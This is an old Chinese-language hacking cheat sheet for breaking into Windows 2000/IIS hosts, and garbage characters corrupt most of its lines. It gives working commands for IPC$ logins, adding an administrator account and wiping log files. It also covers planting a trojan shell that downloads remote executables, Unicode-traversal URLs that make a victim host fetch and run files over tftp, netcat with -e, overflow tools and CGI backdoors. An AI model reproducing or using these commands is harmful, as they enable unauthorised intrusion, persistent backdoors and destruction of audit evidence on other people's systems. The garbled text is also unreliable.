网管和黑客都必须知道的命令
Zz�&�i0��r 常用的几条NET命令:
m�VL��,J=2 <� 5_�Y�s� (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
�9�FLn�7�Y ��gX _�BJ6 (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
v!U�#�C[a^ f8^�58]wx0 (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
@>:07�]Dxo PrKl�wh�i# (查看远程主机时间) net time \\IP地址
�/#s��e>4] /[IQ:'�:�^ (定时启动某个程序) at \\IP地址 02:18 readme.exe
h{xER�IV1u �?�-84_i�� (查看共享) net view \\IP地址
ip�p_�?5TL ��KE3
/<0Z (查看netbios工作组列表) nbtstat -A IP地址
1��=a}{)0h Tx�C�QGzqe (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
�k"7eHSy, ���`��U3� (这两条把自己增加到管理员组): net user 用户名 密码 /add
F��i/G, [q CzE�n_Z�Mb net localgroup Administrators 用户名 /add
Mqtp}<�*@- +r�!h�*��4 (断开连接) net use \\IP地址\ipc$ /delete
B��D0-v�` ��fDqXM;a" 扫尾:
#Fd(�[Zx#. (Sv%-8?gs� del C:\winnt\system32\logfiles\*.*
-d3y!|�\>a FVmg�&�[
. del C:\winnt\ssytem32\config\*.evt
C|J1x4sb@ 85{vz|(':� del C:\winnt\system32\dtclog\*.*
�~&/Gx�_KU _z�5Cp�lO del C:\winnt\system32\*.log
�9h(hx��7] ?BZ�][~n-Q del C:\winnt\system32\*.txt
�%���Nn'p" !m|%4/�
M@ del C:\winnt\*.txt
[;f�"',)y, ^aW[~� c� del C:\winnt\*.log
">9CN�$�]J m'B6q�y!}6 一、netsvc.exe
7:<�Ed"rdE Pvw�%,=41O 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
��L>b,}w�� %$�x�Fn�Gb netsvc /list \\IP地址
6 {Z\cwP)c x�+e
_pb � netsvc schedule \\IP地址 /query
�y��M�kd|1 s-�V$�N��� netsvc \\IP地址 schedule /start
,AM-cwwT:u eFI��4(Y�� 二、OpenTelnet.exe
P.B'Gh#^� ]c2| m}I{: 远程启动主机的Telnet服务,并绑定端口到7878,例如:
1F,_L}=o1s y21�uv�p�' OpenTelnet \\IP地址 用户名 密码 1 7878
�&zcj�U�+n �Sh�6Cw4 R 然后就可以telnet到主机的7878端口,进入DOS方式下:
ACYn8�7�tq ;al�FK*K6 telnet IP地址 7878
FO��=�1P7� m_ m@>}ud 三、winshell.exe
j2�M(W/_� �rtx]dc�1m 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
6w;|�-/:`� )�x�&�@j4, p Path (查看winshell主程序的路径信息)
�OF/�)-}!� q)�b��?X
^ b reBoot (重新启动机器)
=3C��)sz}� � Zwns|23n d shutDown (关闭机器)
'e��64%t�� ~(/H�gFLLu s Shell (执行后你就会看到可爱的“C:\>”)
CWQ2iu�<_0
��m5aa�Y x eXit (退出本次登录会话,此命令并不终止winshell的运行)
I7^X;��Q
F k&�s7�-y�Y CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
Fd&!�-`�T? �)>�5k'1�� 四、3389登陆器,GUI方式登录远程主机的
u/c3omY"#� X2YOD�2�<v 五、elsave.exe
)"uG*}\?b� �am+mXb�� 事件日志清除工具
ha!�� �"BR ��!cw�VJ�e elsave -s \\IP地址 -l "application" -C
�W?
�|�|9� �a3O�_#l-Z elsave -s \\IP地址 -l "system" -C
u/'s�d��t� E}9ldM=]s� elsave -s \\IP地址 -l "security" -C
�](:�FW '- �z�x��Uj1 执行后成功清除应用程序日志,系统日志,安全日志
� =>\-ma�+ ;�S�`�-9}6 六、hbulot.exe
p30&JJ!�~" /t)c fFM�� 开启win2kserver和winxp的3389服务
~�"2@A
F�� � ca*[n~np hbulot [/r]
yG���G��B p��3FnYz-V 使用/r表示安装完成后自动重起目标使设置生效。
(<Z�km�IXN 1D�tMY|wP 七、nc.exe(netcat.exe)
ko2j|*D6@~ ]=V�S~azZ5 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
?}�v%�JUcs �XuoEAu8�] 想要连接到某处: nc [-options] hostname port[s] [ports] ...
|;m`87���4 /8t+d�.r;/ 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
�l�)*�,18n S/<"RfVU#o 参数:
Qs�J�W�"4d 0&IXz�EOr� -e prog 程序重定向,一旦连接,就执行 [危险!!]
6�*aa[,>�� �u<=KC/vZe -g gateway source-routing hop point[s], up to 8
"�L�q|�66� cg�xF�E��v -G num source-routing pointer: 4, 8, 12, ...
�auTT��v�J �'R�d*X6dv -h 帮助信息
@@3,+7��%1 ����I,4�- -i secs 延时的间隔
-F+��P��;S WCmN�ib��j -l 监听模式,用于入站连接
}i7�U�}��T ��$W {yK+N -n 指定数字的IP地址,不能用hostname
�� ;[�KriW ca/o#9:N`: -o file 记录16进制的传输
^Z>B/aJ�q� K+@eH#Cv,( -p port 本地端口号
r c�tSS:�1 0Ypi�HoM -r 任意指定本地及远程端口
Zp��(=[n5� k'ZUBTRq!� -s addr 本地源地址
,>
(b�t%�b (!VMnLlXRK -u UDP模式
\YlF�>{LVe q]�N?@l]� -v 详细输出——用两个-v可得到更详细的内容
�V��qC�l�M L��e`���/� -w secs timeout的时间
tSb���?]J �9jMC�|oE� -z 将输入输出关掉——用于扫描时
!
�nC�jA\$ 八、TFTPD32.EXE
,z�N3? /�7 X$-��b�oe? 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
2fzKdkJhe� �a�I=�{,\ http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
XJmFJafQD� #��5y�9L�� 然后可以直接令文件运行:
M�jQ[^%lfL Ns.3�s7&� http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
�:�T7?��� *b�Ci2mbm@ 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
��s�-C!uq� �m�sc 1^2 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
D�Hm[8 Q�p ~*7���O(�8 一、一 Xscan命令行运行参数说明:
|�o�e!�P}u t{R5�
�E�U 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
�"[jh�aUAK 83�KfM!��w 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
(�px*R��~} Yz�j%{fk�h xscan -file <主机列表文件名> <检测项目> [其他选项]
RDs,sj/Y9? Gr5`�1�`8| 其中<检测项目> 含义如下:
� �2Vp��>" ���`�*e�4m -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
�y#�S1c)vU 0LWd�J�($? -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
t�a&Q4�v&- mi7sBA9�L8 -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
��Mn]}s�:v EHp�u*P~W� -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
[AX�snpa/C T>#TDMU#Fm -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
sS,
z��zx< ;#3ekl{�-g [其他选项] 含义如下:
Bu7A{DRf�� :3*`�IB �! -v: 显示详细扫描进度
�(��"_Q��� ��|/@0~O(6 -p: 跳过Ping不通的主机
��]{Y�N{� I+�0c�8T(: -o: 跳过没有检测到开放端口的主机
QT#b>x�V)1 �z�>6.[Z(T -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
